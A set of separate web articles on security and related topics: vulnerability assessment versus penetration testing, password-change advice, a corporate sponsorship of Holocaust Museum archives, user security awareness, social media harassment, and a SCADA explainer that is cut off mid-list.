- Configuration vulnerabilities: These are misconfigurations or settings in systems, networks or applications that create security weaknesses. Examples include weak passwords, unsecured network services or protocols & unnecessary open ports.
- Patching vulnerabilities: These are vulnerabilities that arise from missing or outdated patches or updates for software applications, operating systems or libraries. Attackers can exploit known vulnerabilities that have not been patched, making patch management an important part of Vulnerability Assessment.
- Mobile application vulnerabilities: These are vulnerabilities that specifically affect mobile applications, such as insecure data storage, insecure communication channels & insufficient authentication & authorization.
- Network vulnerabilities: These are vulnerabilities that exist in network devices, protocols or configurations, such as misconfigured firewalls, weak encryption or unpatched network equipment.
It’s important to note that vulnerabilities can vary in severity & not all vulnerabilities pose the same level of risk. The severity of a vulnerability depends on factors such as the potential impact of exploitation, the likelihood of exploitation & the context in which the vulnerability exists.
Vulnerability Assessments offer several benefits to organisations, but they also have some limitations. Here are some of the key benefits & limitations of Vulnerability Assessment:
- Increased security: Vulnerability Assessments help organisations identify & address security weaknesses before they can be exploited by attackers.
- Compliance: Vulnerability Assessments can help organisations meet Regulatory Compliance requirements, such as those in the Payment Card Industry Data Security Standard [PCI DSS] or the General Data Protection Regulation [GDPR].
- Cost-effectiveness: Vulnerability Assessments can help in identifying & addressing vulnerabilities proactively. This can avoid costly security breaches & reduce the overall cost of security.
- Prioritisation: Vulnerability Assessments help organisations prioritise which vulnerabilities to address first based on their severity & potential impact.
- False positives & false negatives: Vulnerability Assessments can sometimes generate false positives, identifying a vulnerability that doesn’t actually exist or false negatives, failing to identify a real vulnerability. This can result in wasted resources & can cause organisations to overlook real vulnerabilities.
- Lack of context: Vulnerability Assessments can identify vulnerabilities, but they may not provide the context needed to understand the risk they pose.
- Limited scope: Vulnerability Assessments are typically limited to the systems & applications that are included in the assessment. This means that vulnerabilities in other systems or applications may go unnoticed.
- Incomplete coverage: Vulnerability Assessments may not cover all possible attack vectors or all types of vulnerabilities. This means that an Organisation may need to supplement Vulnerability Assessments with other security measures, such as Penetration Testing [PT] or Threat Modelling.
What is Penetration Testing?
Penetration Testing [PT], also known as Pen-Testing, is a method of evaluating the security of a system or network by simulating an attack from a malicious actor. The goal of a Penetration Test is to identify vulnerabilities in the system that could be exploited by an attacker & to provide recommendations for improving the system’s security posture.
During a Penetration Test, a trained Security Professional, known as a Penetration Tester or Ethical Hacker, will attempt to exploit vulnerabilities in the system or network using techniques similar to those used by real attackers. The tester will use a combination of automated tools & manual techniques to identify vulnerabilities, gain unauthorised access to the system & escalate privileges to gain deeper access.
Penetration Testing can identify various types of vulnerabilities in a system or network. Some common types of vulnerabilities that can be identified through Penetration Testing include:
- Wireless network vulnerabilities: These vulnerabilities may include weaknesses in wireless networks, such as weak encryption, unauthorised access points or rogue devices, that could be exploited to gain unauthorised access or intercept network traffic.
- Web application vulnerabilities: These vulnerabilities may include flaws in web applications, such as input validation issues, authentication & authorization weaknesses & SQL Injection or Cross-Site Scripting [XSS] vulnerabilities, that could be exploited to gain unauthorised access or manipulate data.
- Operating system vulnerabilities: These are vulnerabilities that can be exploited by an attacker to gain unauthorised access to an operating system.
- Social engineering vulnerabilities: These vulnerabilities may involve exploiting human factors, such as social engineering attacks, phishing or pretexting, to gain unauthorised access or manipulate users into revealing sensitive information.
- Insider threats: These vulnerabilities may involve the exploitation of insider threats, such as unauthorised access or misuse of privileges by employees, contractors or partners, that could result in unauthorised access, data breaches or other security incidents.
Penetration Testing provides several benefits to organisations, but it also has some limitations. Here are some of the key benefits & limitations of Penetration Testing:
- Identify vulnerabilities: Penetration Testing helps organisations identify vulnerabilities in their systems & applications that could be exploited by attackers.
- Improve security: By identifying vulnerabilities & addressing them, organisations can improve their overall security posture.
- Regulatory Compliance: Penetration Testing can help organisations meet Regulatory Compliance requirements, such as those in the Payment Card Industry Data Security Standard [PCI DSS] or the General Data Protection Regulation [GDPR].
- Real-world testing: Penetration Testing provides a real-world assessment of an organisation’s security posture. It helps to identify weaknesses that may not be apparent through other forms of testing, such as Vulnerability Assessments or Code Reviews.
- Cost: Penetration Testing can be expensive, especially for large or complex systems making it difficult for some organisations to afford it.
- False sense of security: Penetration Testing may give organisations a false sense of security if they believe that their systems are secure after a successful test. However, in reality, security is an ongoing process & new vulnerabilities can emerge at any time.
- Limited scope: Penetration Testing is typically focused on a specific system or application. This means that vulnerabilities in other systems or applications may go unnoticed.
- Disruption: Penetration Testing can be disruptive to business operations, especially if the test causes system downtime or other disruptions.
Vulnerability Assessment vs Penetration Testing: Key differences
Vulnerability Assessment & Penetration Testing are both important components of a comprehensive security program, but they differ in their approach & objectives.
Here are some of the main differences between Vulnerability Assessment & Penetration Testing:
- Objective: The main objective of Vulnerability Assessment is to identify vulnerabilities in a system or network, while the main objective of Penetration Testing is to identify vulnerabilities & exploit them to determine the extent to which an attacker could compromise the system.
- Methodology: Vulnerability Assessment is typically conducted using automated tools that scan for known vulnerabilities in a system or network, while Penetration Testing involves manual testing & exploitation of vulnerabilities using both automated & manual tools.
- Scope: Vulnerability Assessment typically covers a wider scope of systems & applications, while Penetration Testing is typically more targeted & focused on specific systems or applications.
- Timing: Vulnerability Assessment is typically conducted regularly, such as quarterly or annually, while Penetration Testing is usually conducted less frequently, such as once or twice a year.
- Reporting: Vulnerability Assessment typically provides a list of vulnerabilities identified along with recommendations for addressing them, while Penetration Testing provides a detailed Report that includes the methods used to identify vulnerabilities, the vulnerabilities identified, Proof of Concept [PoC] for each vulnerability that is identified & recommendations for addressing them.
- Cost: Vulnerability Assessment is generally less expensive than Penetration Testing since it relies primarily on automated tools & requires less manual effort.
Vulnerability Assessment vs Penetration Testing: Which is better?
Both Vulnerability Assessment & Penetration Testing are important testing methods that play a critical role in identifying & mitigating security risks in systems & networks. Each method has its advantages & disadvantages & the choice between them depends on the organisation’s specific needs & goals.
Vulnerability Assessment is typically more appropriate than Penetration Testing in the following situations:
- Regular Security Assessments: Vulnerability Assessment is a cost-effective way to conduct regular Security Assessments, as it can be automated & scaled to cover a wide range of systems & applications.
- Compliance requirements: Many Compliance Frameworks require regular Vulnerability Assessments, making them a necessary part of Compliance efforts.
- Risk management: Vulnerability Assessment can help organisations identify potential security risks & prioritise remediation efforts based on the severity & impact of identified vulnerabilities.
- Limited resources: Vulnerability Assessment requires less specialised skills & expertise than Penetration Testing, making it more accessible to organisations with limited resources.
Penetration Testing is typically more appropriate than Vulnerability Assessment in the following situations:
- Testing specific controls: Penetration Testing is a more targeted approach that can be used to test specific security controls, such as firewalls, intrusion detection systems & access controls.
- Real-world simulation: Penetration Testing provides a more realistic simulation of an attacker’s attempt to exploit vulnerabilities, providing valuable insights into the effectiveness of an organisation’s security controls & incident response processes.
- Prioritised testing: Penetration Testing can be focused on high-value assets, enabling organisations to prioritise testing efforts based on the risk profile of specific systems & applications.
- Validating vulnerabilities: Penetration Testing can be used to validate vulnerabilities identified through a Vulnerability Assessment, ensuring that identified vulnerabilities are not false positives & providing additional context around the severity & impact of identified vulnerabilities.
Vulnerability Assessment vs Penetration Testing: When to conduct?
Organisations should conduct both Vulnerability Assessment & Penetration Testing [VAPT] as part of their overall security testing strategy. The specific timing of these assessments will depend on a variety of factors, including the organisation’s risk profile, compliance requirements & budget.
Vulnerability Assessment should be conducted regularly, typically quarterly or annually, to identify potential vulnerabilities in an organisation’s systems & applications. In addition, Vulnerability Assessment should be conducted whenever new systems or applications are introduced or significant changes are made to existing systems or applications. This helps to ensure that vulnerabilities are identified & addressed on time, reducing the risk of a successful cyberattack.
Penetration Testing, on the other hand, is typically conducted less frequently, often once per year or on an as-needed basis. Penetration Testing should be conducted when an organisation wants to validate the effectiveness of its security controls or when there is a specific concern or risk that needs to be addressed. Penetration Testing can also be conducted as part of a red team exercise, where a team of ethical hackers attempts to simulate a real-world attack on an organisation’s systems & applications.
Vulnerability Assessment & Penetration Testing are two essential security testing methods used to identify & mitigate vulnerabilities in systems & applications. Vulnerability Assessments are typically automated scans that identify vulnerabilities & provide information on how to address them. Penetration Testing involves attempting to exploit vulnerabilities to identify weaknesses in security controls & provide recommendations for remediation.
When choosing between Vulnerability Assessment & Penetration Testing, it’s important to consider the specific needs of your organisation. Vulnerability Assessments are generally more automated & provide a broad overview of potential vulnerabilities, while Penetration Testing is more focused & provides a deeper analysis of specific vulnerabilities. Vulnerability Assessments are typically conducted more frequently, while Penetration Testing is typically conducted periodically.
What is the difference between Vulnerability Assessment & Penetration Testing?
Vulnerability Assessment & Penetration Testing are two distinct security testing methods used to identify & address vulnerabilities in systems & applications. Vulnerability Assessment involves using automated tools to scan for vulnerabilities in a system, network or application. It provides a broad overview of potential vulnerabilities, their severity & recommendations for remediation.
Penetration Testing involves attempting to exploit identified vulnerabilities to test the effectiveness of security controls & identify weaknesses that could be exploited by malicious actors. It provides a more in-depth analysis of specific vulnerabilities & their potential impact.
Which is better: Vulnerability Assessment or Penetration Testing?
Neither Vulnerability Assessment nor Penetration Testing is inherently better than the other, as they serve different purposes & have different scopes. Vulnerability Assessment is more automated & provides a broad overview of potential vulnerabilities, making it suitable for regular scans & identifying vulnerabilities in a wide range of systems & applications. On the other hand, Penetration Testing is more focused & involves actively attempting to exploit identified vulnerabilities to assess the effectiveness of security controls, making it suitable for targeted testing & providing in-depth analysis of specific vulnerabilities. The choice between Vulnerability Assessment & Penetration Testing depends on the organisation’s requirements. | <urn:uuid:a2ab66d5-885a-4306-87b1-f19d42e2018a> | CC-MAIN-2024-38 | https://www.neumetric.com/vulnerability-assessment-vs-penetration-testing/ | 2024-09-17T19:51:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00592.warc.gz | en | 0.921719 | 3,011 | 3.78125 | 4 |
Data breaches are becoming an increasingly devastating problem in the USA, with the number of data breaches increasing from 30.9 million to 96.7 million from 2022 to 2023. That is an alarming statistic, and it presents an ever-growing concern that your personal and financial information is at risk of theft.
- Key Takeaways
- Understanding the Importance of Regular Password Changes
- Factors Influencing How Often You Should Change Your Passwords
- Recommended Frequency for Changing Personal Passwords
- Best Practices in Creating and Managing Passwords
- Responding to Security Breaches and Compromised Passwords
- Educating Others on Password Security
- How Often Should Personal Passwords be Changed – Frequently Asked Questions
With these kinds of data breaches, identity theft is also increasing in frequency and severity, having more than tripled between 2019 and 2021 alone. These numbers illustrate why identity theft protection is so important!
Perhaps the most striking statistic here is that nearly 80% of all data breaches that occur happen due to stolen or weak passwords. No matter the account type in question, your password is your number one line of defense against hackers and thieves.
However, having a single password for all of your accounts is a major risk, as is using the same passwords for months or years on end.
This begs the question of how often personal passwords should be changed, or if they should be changed at all. Let’s determine exactly how your passwords protect you, the risks associated with not changing them, and how often they should be changed.
- Thanks to the increasing number of data breaches in the USA, there is a growing need for robust online security practices.
- One of the best ways to keep your personal and financial information secure is to regularly change your passwords.
- Changing your password frequently, or not at all, poses various risks, and there is a recommended frequency for changing personal passwords.
Understanding the Importance of Regular Password Changes
Changing your password isn’t just about coming up with a cool new phrase to type into the password field every time you log into an account, rather it’s a primary line of defense to keep you protected from thieves and hackers.
The Role of Passwords in Online Security
As far as your personal accounts are concerned, your password is the first line of defense you have against infiltration. It’s about keeping your confidential information secure and safe.
Not only are passwords designed to protect your data, but also to authenticate your identity, or in other words to ensure that only authorized people are accessing the accounts in question.
Passwords determine who can and cannot access your accounts, whether social media, banking accounts, or anything in between.
Risks of Infrequent Password Changes
There are many risks associated with infrequent password changes, mainly that someone will eventually figure out what your password is. If someone is actively trying to hack into one of your accounts, the older your password is, the likelier a hacker is to guess it, quite simply because they have more time to do so.
The longer you give thieves the opportunity to determine your password, the higher the chances of your accounts being breached. This is especially the case if you happen to use the same password for multiple accounts.
If a hacker figures out your password for one account, they’ve effectively figured out the password for all of them. We’re aware that we’re talking specifically about hackers here, but the reality is that this could potentially apply to friends and family members as well. You never know who’s trying to access your accounts.
Preventing Unauthorized Access with Regular Password Changes
One of the best ways to prevent unauthorized access to any of your accounts is to regularly change your passwords. The more often you change your passwords, the lower the chances of a breach occurring, particularly due to stale or old passwords.
An individual may think that they’re getting close to figuring out your password, only for you to change it to something completely different, forcing them to start at the beginning. It’s all about minimizing the window of opportunity that a cyber criminal has to breach your accounts.
Factors Influencing How Often You Should Change Your Passwords
There are quite a few factors that you’ll want to consider when it comes to how often you should change your passwords. Let’s look at a few.
Security Requirements and Account Types
The type of account in question makes a difference. For instance, if we are talking about a simple social media account, changing the password frequently may not be quite as important as changing the password for accounts that contain more sensitive information, such as personal data and financial information. The more important the information within the account, the more frequent the password changes should be.
Recent Security Threats
If you discovered that there were recent security threats, then a password should be changed right away. If you often get notified of security threats from your antivirus or antimalware systems, changing passwords regularly is beneficial.
Furthermore, if you discover that any kind of system or software you are using is prone to security breaches, then frequent password changes are recommended. The more vulnerable the system in question, the more frequent the password changes should be.
Personal vs. Professional Accounts
Depending on the organization you work for, there might be protocols in place for password changes.
There are many informational technology departments in businesses that require passwords to be changed as frequently as every 30 days, particularly those that allow for access to sensitive information.
However, if personal accounts are concerned, especially those that don’t contain any crucial financial information, the schedule may be a bit more flexible.
Recommended Frequency for Changing Personal Passwords
Depending on who you ask, passwords should be changed every three to six months. Here are some steps for you to follow about the recommended frequency for changing your personal passwords.
Step 1: Identifying High-Risk Accounts That Require More Frequent Changes
To determine how often a password should be changed, you need to determine how high-risk the account in question is. For instance, the most important ones to pay attention to are e-mail accounts and any type of financial account. These are the highest risk, followed by anything else that may contain personal information. Even social media accounts are at risk of being hacked.
Step 2: Establishing a Routine Schedule for Updating Passwords
Half the battle of changing your passwords regularly is remembering to do it in the first place, which means that you want to set yourself some kind of reminder for doing so.
There are automated systems out there designed specifically for this purpose, so you don’t have to remember yourself.
Changing all of your passwords at once however can be quite a hassle, so you may want to stagger this unless you’re using state-of-the-art password management software.
Step 3: Implementing Password Managers for Effective Management
Speaking of password managers, this is one of the best ways to ensure your online security. There are some password managers out there that allow for automatic password changes on a scheduled basis.
Furthermore, these password managers usually come with what are known as vaults where passwords are securely stored.
This means that you can create unique passwords for every account, store them in the vault, and not even have to remember them yourself. A Password manager like 1Password offers password services for individuals, families, and businesses alike. Read our 1Password review right here!
Step 4: Using Multi-factor Authentication for Enhanced Security
Multi-factor or two-factor authentication is another great way to protect your passwords, and it’s a good way to reduce the frequency at which passwords need to be changed.
Multi-factor authentication requires a second form of verification, such as a fingerprint, text message, phone call, or e-mail, besides your password alone. In fact, it’s considered one of the best ways to keep your information secure.
Step 5: Staying Informed About the Latest Security Threats and Recommendations
To keep yourself protected, staying aware of new threats is essential. Therefore, stay up to date on security news and always update your practices to stay one step ahead of thieving criminals.
Best Practices in Creating and Managing Passwords
Right now, we’re going to provide you with all of the information that you need for creating and managing passwords in such a way that will keep you and your financial information protected.
Tips for Creating Strong and Unique Passwords
The following tips for creating strong and unique passwords should help keep you protected to some degree.
- Never use any kind of personal information that can be easily accessed by hackers.
- Using a random sequence of letters and numbers, or a random sequence of words is ideal.
- Try to avoid using any kind of predictable patterns that are easy to determine.
- The longer and more complex your password is, the harder it will be to crack. You should have a mix of numbers, uppercase and lowercase letters, and symbols.
- Using a password manager in your browser is an easy way to create strong passwords.
Using Password Managers for Maintaining Password Hygiene
The fact is that one of the easiest ways to create secure passwords and to manage them is to use a password manager.
High-quality password managers provide many different services, including creating some of the most secure passwords in the world, storing them in a secure place, and automatically inserting them into password fields as required.
In case you’re looking for a good option, Dashlane is another fantastic password manager that we recommend.
Many of these password managers also have features that automatically change your sensitive passwords on a regular basis, to ensure maximum security. If you’re looking to make your life easier as far as password management is concerned, a good manager is required.
Common Mistakes to Avoid When Creating and Storing Passwords
There are some common mistakes in regard to passwords that many of us commit, but they need to be avoided at all costs.
- Never ignore the security updates on your computer or other devices.
- Do not ignore a message about a security breach from your antivirus system.
- Never keep physical records or write down your passwords where other people can find them.
- Don’t keep reusing passwords, especially not across multiple accounts.
Responding to Security Breaches and Compromised Passwords
The unfortunate reality is that security breaches and compromised passwords happen, and if they do, how severe the breach is may depend on how fast and how well you react.
Immediate Reactions to Security Breaches
What are some of the immediate reactions that you should have when there’s a security breach in one or multiple accounts?
- As soon as there is some kind of security threat or breach, immediately change your password. If you’ve used the same password for another account, change that as well, but make sure it’s different from all of your others.
- Access your security systems to see if you have any notifications of breaches in any of your other accounts.
- You should also monitor all of your accounts to see if there is any suspicious activity happening. This is especially the case as far as your banking accounts are concerned. If you notice missing money or unauthorized charges, you’ll need to contact your financial institution to take immediate action.
Considerations for Securing Accounts Post-Breach
If your account has been breached, there are a few things you should consider doing so it doesn’t happen again.
- If you haven’t already enabled two-factor or multi-factor authentication, do so immediately, as this adds an extra layer of security to your accounts.
- If you’re having trouble creating and managing your passwords, a password manager like Safe or KeePass is recommended, as this will take care of all of the hard work for you, while keeping you and your information secure.
- Always review your account permissions, because there may be third-party applications that have access to your accounts that should not.
- If the system you are using suffers from security breaches on a constant basis, consider switching providers. For instance, if you have one e-mail service that is constantly hacked, consider changing to another.
Educating Others on Password Security
Now that you’ve read everything there is to know about password change frequency, you should be an expert on it, but this doesn’t mean that the people around you are aware. Therefore, you should educate your friends and family members on password security.
Make sure that they know that long and complex passwords are best, that they should be changed frequently, and that there are applications and services out there that can assist them on this front.
Once again, if all else fails, the easiest way to keep you and your family secure is by using a password-managing service.
How Often Should Personal Passwords be Changed – Frequently Asked Questions
Let’s quickly answer some frequently asked questions about how often your passwords should be changed.
Should I Change My Password Regularly?
Yes, passwords should be changed regularly, between every three and six months depending on the type of account.
Is Not Changing Passwords Regularly a Security Risk?
The longer you go between password changes, the greater the risk that a hacker is able to crack your password and find their way into your accounts.
Should I Change My Passwords Often?
Passwords should be changed as often as the account type in question calls for. The more sensitive the information, the more often a change should occur.
What if I Forget My New Passwords Often?
If you’re someone who has trouble remembering your new passwords, the easiest solution is to use a high-quality password manager. A password manager cannot only remember your passwords for you but create high-quality ones as well.
How Often Should a Password Be Changed?
Passwords should be changed every three months.
Can Password Change Frequency Prevent All Forms of Cyber Attack?
Although changing your passwords can provide you with a great deal of protection against hackers and account breaches, it is unfortunately not able to prevent all forms of cyber-attack. | <urn:uuid:ac256bd8-cd84-4796-af2e-fc6f7f131644> | CC-MAIN-2024-38 | https://battensafe.com/resources/how-often-should-personal-passwords-be-changed/ | 2024-09-20T06:28:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00392.warc.gz | en | 0.943316 | 2,936 | 2.765625 | 3 |
United States Holocaust Memorial Museum and Days of Remembrance
In honor of the “Days of Remembrance,” Iron Mountain participated in the annual event on April 28-29, 2019 in Washington, DC.
The Days of Remembrance of the Victims of the Holocaust (DRVH) is an annual 8-day period designated by the United States Congress for civic commemorations and special programs that help citizens remember and draw lessons about the Holocaust. The annual DRVH period normally begins on the Sunday before the Israeli observance of Yom HaShoah, Holocaust Memorial Day, and continues through the following Sunday, usually in April or May.
A National Civic Commemoration is held in Washington, D.C., with state, city, and local ceremonies and programs held in most of the fifty states, and on U.S. military ships and stations around the world. The United States Holocaust Memorial Museum (USHMM) designates a theme for each year's programs, and provides materials to help support remembrance efforts.
Iron Mountain has a new partnership with the USHMM through our Living Legacy Initiative - our charitable commitment to preserve and make accessible historical and cultural information and assets. Iron Mountain's grant will support the discoverability and eventual digitization of archival materials from the U.S. prosecutors at the Nuremberg Trials, which prosecuted Nazi leadership after World War II. The 300,000 pages contain post-war documentation that was essential to the war crimes trials and helped set the stage for international law. The documents will serve as learning aids for years to come. Because of Iron Mountain's support for preserving the Nuremberg Trials records, we were invited to participate in the Days of Remembrance events.
The first day included a ceremony in which Iron Mountain was thanked for its financial gift and an inscription was unveiled on the Museum's wall. "It was an honor to attend the Days of Remembrance unveiling ceremony," said Theresa Pattara, VP Government Affairs. "We listened to families of survivors speak and also heard about the personal experiences of some of the newer Museum staff. I learned much about the Museum's role in not only educating new generations about the atrocities that occurred, but also its work to prevent similar ones from occurring again. I'm proud that Iron Mountain is able to support access to the Nuremberg prosecutors' records through the Living Legacy Initiative."
On the second day, Iron Mountain employees attended the National Commemoration of the Days of Remembrance at the U.S. Capitol in Washington, DC. Israel's Ambassador, Ron Dermer, offered remarks, and music was played by the U.S. Army Band. "The setting was extremely powerful with Holocaust survivors in attendance," said Chris Smith, Senior Vice President of Records Management. "Our Living Legacy program is a true testament of Iron Mountain's core values and I am so proud to work for a company who invests time, effort and money into worthy causes like the United States Holocaust Memorial Museum."
Since 1982, the United States Holocaust Memorial Museum (USHMM) has led the National Days of Remembrance ceremony with Holocaust survivors, members of Congress, White House officials, liberators, and community members at the U.S. Capitol.
Information Security Paradox
The root cause of why users still need awareness in 2006 lies in a legacy of behavior: incorrect security habits. In computer systems, it is common to start by implementing "wide open" systems or programs and then closing them down once functionality tests show they are working. This kind of behavior is reflected in all services in use today. Our email addresses allow everything. In general, default configurations allow everything to pass and deny nothing. Internet browsers are wide open as well (script languages); security features for end users take up only a few pixels in the bottom-right corner of Internet Explorer (where a padlock is shown). Default protocols are very open as well (for example, HTTP, FTP, and so on). Those who create the protocols and programs should apply the famous need-to-know principle in their work: a need-to-run basis.
Although it is understandable that the original Internet services did not carry many safety measures, it is amazing that fairly new services such as VOIP suffer from the same lack of protection. Although they are all based on the same stack of protocols, one would expect some stronger security built into these emerging tools. But on the contrary...
There is a direct relationship between the increase in Internet services for the end user and their exposure (risk of loss of confidentiality, computer compromise, and identity theft). The complexity or the multiplicity of services ensures that it takes dedication to be able to run a secure Wireless LAN at home. In other words, the potential for mistakes/deliberate malicious acts increases because the numbers of available services and dependencies increase.
Additionally, when we speak about security awareness, we ask end users to take responsibility for the emails they receive, while we have removed the responsibility of system administrators to secure their own systems by implementing vulnerability scanners, integrity tools, and so on. There is a paradox here: We do not trust a system administrator with the configuration of their systems, so we implement internal port or application scanners. Yet we ask the end user, who is not an expert in information systems, to know and apply a set of good practices.
In the future, every user will need to know much more about computers and the Internet. In the late 1980s when personal computers started to be universally used, some people were excluded because they did not make the move. We face a similar model with computer behavior. Future workers will have to have secure behavior embedded in their habits or else they will not work at all. Would you hire someone who would click on an email with Paris Hilton on it? I predict that today’s type of awareness programs will become irrelevant when people know how to deal with current problems. Not because of outstanding security awareness programs, but because of the issues each of them will have faced in their everyday experiences. The human firewall is building itself, regardless of the awareness program effort. | <urn:uuid:9e584ce7-d5b5-4d7b-b36c-1694c0dc999b> | CC-MAIN-2024-38 | https://www.ciscopress.com/articles/article.asp?p=663084&seqNum=2 | 2024-09-16T15:08:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00792.warc.gz | en | 0.956742 | 583 | 2.65625 | 3 |
Some conversations on social media can get … heated. Some can cross the line into harassment. Or worse.
Harassment on social media has seen an unfortunate rise in recent years. Despite platforms putting in reporting mechanisms, policies, and even using AI to detect and remove harmful speech, people are seeing more and more harassment on social media.
Yet even as it becomes more prevalent, nothing about it is normal. Or acceptable. No, you can’t prevent social media harassment. Yet you can protect yourself in the face of these attacks.
Online harassment statistics continue to climb.
In 2023, research showed that 52% of American adults said they experienced harassment at some point online. That’s up from 40% in 2022. Also in 2023, 33% said they experienced it in the last year, a jump of 10% from 2022.i
The same trend follows for teens, where 51% of them said they experienced harassment in the past year, compared to 36% in the year prior.ii
Earlier research conducted in the U.S. tracked a significant rise in harassment online between 2014 and 2020. This included the doubling or the near doubling of the most severe forms of online harassment.iii
Our own research in 2022 also noted a rise of another kind — worry about online harassment. Globally, 60% of children said they were more worried that year about social media harassment (cyberbullying) compared to the year prior. Their parents showed yet more concern, with 74% of them more worried that year about their child being harassed than the last.iv
The human cost of social media harassment.
Stats are one thing, yet behind each figure stands a victim. Harassment takes a hard toll on its victims — emotional, financial, and sometimes physical. That becomes clear the moment you look at the forms it can take.
Social media harassment includes:
- Flaming — Online arguments that can include personal attacks.
- Outing — Disclosing someone’s sexual orientation without their consent.
- Trolling — Intentionally trying to instigate a conflict through antagonistic messages.
- Doxing — Publishing private or identifying info without someone’s consent.
- Cyberstalking — Collecting info and tracking the whereabouts of a victim in a threatening way.
- Identity Theft — Stealing a victim’s accounts or posting messages posing as them online.
It includes other acts, such as:
- Spreading false rumors.
- Sending explicit images or messages.
- Threats of physical harm.
In practice, the results can get ugly. Scanning press releases from various state attorneys general, you’ll find unflinching accounts of harassment. Like a targeted, three-year cyberstalking campaign against a victim and that person’s parents, coworkers, siblings, and court-mandated professionals.v Another, where the harasser attempted to defame his victim through a fake LinkedIn profile — and further doxed his victim by publicly posting source code the victim had written worth millions of dollars.vi
All of this serves as a reminder. Harassment can quickly turn into a crime.
How to protect yourself from harassment on social media.
The unfortunate fact remains that you can’t prevent social media harassment. Some people simply find themselves driven to do it. But you can take several steps to shield yourself from attackers and deny them the info they need to fuel their attacks.
Secure your accounts.
Account security should be a high priority for you, your loved ones, and anyone else. That’s especially true during periods of harassment. Every account you have should be secured with a complex password — at least 12 to 14 characters long, with numbers, capital letters, lowercase letters, and symbols. And with two-factor authentication.
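The password guidelines above can be expressed as a quick self-check. This is a hedged sketch of the stated rules only (12+ characters spanning all four character classes); it does not replace checking against breached-password lists or using a manager:

```python
import string

def meets_policy(password, min_length=12):
    """Check a password against the guidelines above: at least
    `min_length` characters, with a lowercase letter, an uppercase
    letter, a digit, and a symbol."""
    symbols = set(string.punctuation)
    return (len(password) >= min_length
            and any(c.islower() for c in password)
            and any(c.isupper() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in symbols for c in password))
```

A check like this catches only structural weakness; a long passphrase held in a password manager, plus two-factor authentication, is still the stronger combination.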
Two-factor authentication is especially important when it comes to account security. The reason is simple: a lot of harassers are tech-savvy, and enjoy taking over a victim’s account to make offensive comments in their name and damage their reputation.
Two-factor authentication prevents account takeovers like this. It requires a user to know the password and username for an account, along with another way they can prove they are who they say they are. Often that involves a code sent to their smartphone that they can use to verify their identity. At McAfee, we recommend you use two-factor authentication on any account that offers it.
Control who can follow you.
Social media platforms offer plenty of ways you can lock down your privacy, even as you remain “social” on them to some degree. Our Social Privacy Manager can help you be as private as you like. It helps you adjust more than 100 privacy settings across your social media accounts in only a few clicks, so your personal info is only visible to the people you want to share it with. By making yourself more private, you deny a potential harasser an important source of info about you, in addition to your friends, family, and life overall.
Limit what you share online.
Limit how much info you share about yourself on social media websites. Addresses, phone numbers, and locations shouldn’t be shared in posts and shouldn’t be included in biographies. Attackers can use this type of info to make false threats and, in some cases, falsify crimes to elicit a police response — this is a technique called “SWATTING” and it’s quite serious.vii
In some instances, harassers gather info about their victims on data brokers or “people finder” sites. Some of this info can get pretty detailed, and these sites will sell it to anyone. You can clean up that info, however. Our Personal Data Cleanup scans data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites — or remove it for you, depending on your plan.
Harassed on social media? Here are the steps to take.
Report the harassment to the social media platform.
If you find yourself targeted, don’t respond. That’s what the harasser wants. Use your social media platform’s tools to block and then report the harasser. Many platforms have web pages dedicated to harassment that walk you through the process.
Report harassment to the authorities.
First off, if you feel that you are in immediate danger, contact your local authorities for help.
In many cases, harassment is illegal. Slander, threats, damage to your professional reputation, doxing, and many of the examples mentioned earlier can amount to a crime. There are options for victims, legally speaking. If you feel a harassment campaign has crossed the line, then it’s time to contact the authorities. Bring proof of harassment. Take screenshots of everything and submit them as part of your complaint.
Talk with trusted family members and friends.
We’ve seen just how damaging and painful harassment can be. Let trusted people in your life know what’s happening. Lean on them for support. And have them help you find any resources you might need in the wake of harassment, such as counseling or even legal assistance. You might find this tough to do, yet realize that you’re not at fault here. Any ugliness you’re dealing with comes from the hands of a harasser. Not yours. Close family and friends will recognize this. | <urn:uuid:70eae74c-895a-4a50-9a16-71d5b5391d54> | CC-MAIN-2024-38 | https://www.mcafee.com/blogs/internet-security/the-rising-threat-of-social-media-harassment-heres-how-to-protect-yourself/ | 2024-09-17T22:07:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00692.warc.gz | en | 0.944115 | 1,541 | 2.53125 | 3 |
What is SCADA?
Supervisory Control and Data Acquisition, commonly known as SCADA, is an automated control system used in modern electrical systems to help drive more efficient operations. SCADA systems are designed to collect data from critical assets via sensors installed within equipment across an organization. Data can be processed and analyzed, and the output can be used to enable personnel to make better, more informed decisions about the best course of action with their assets.
SCADA systems consist of software and hardware components that enable operators to gather data to efficiently monitor, control, and optimize electrical assets. These systems provide remote control for equipment monitoring processes, performance aberrations, and data analysis.
How does SCADA work?
Communication networks are the backbone that connects components such as sensors, RTUs (Remote Terminal Units), PLCs (Programmable Logic Controllers), and the central control system in SCADA systems. These communication networks ensure data flows seamlessly between field devices and the central system, enabling real-time monitoring and control.
Operational efficiency and electrical asset reliability are enhanced when a SCADA system is connected to equipment. The system can collect varying types of data from equipment, including temperature, pressure, or speed data. The data may then be analyzed and presented in a dashboard, and trends can be determined.
Such insights may then be used to take broader actions, allowing personnel to make better decisions.
A typical SCADA system will comprise several components, which include:
- Sensors and Actuators: Sensors provide the necessary data from measured parameters like pressure, flow, voltage, and temperature for monitoring, while actuators receive control signals from controllers (RTUs or PLCs) to enable automated adjustments and optimization. Both are crucial components of SCADA systems, providing real-time feedback on process performance and the means to act on it.
For example, if a sensor detects a high temperature trend, an actuator can be triggered to turn on a cooling system.
- Remote Terminal Units (RTUs): RTUs collect real-time data from sensors connected to their input modules and forward the processed data to the central SCADA system over the preferred communication channel. Data is forwarded regularly or when significant changes occur, ensuring the central control system has up-to-date information.
- Programmable Logic Controllers (PLCs): PLCs allow direct control of machinery and processes based on sensor data. The PLC receives control commands from the SCADA system and adjusts the actuators accordingly, such as opening or closing valves, starting or stopping motors, or adjusting flow rates.
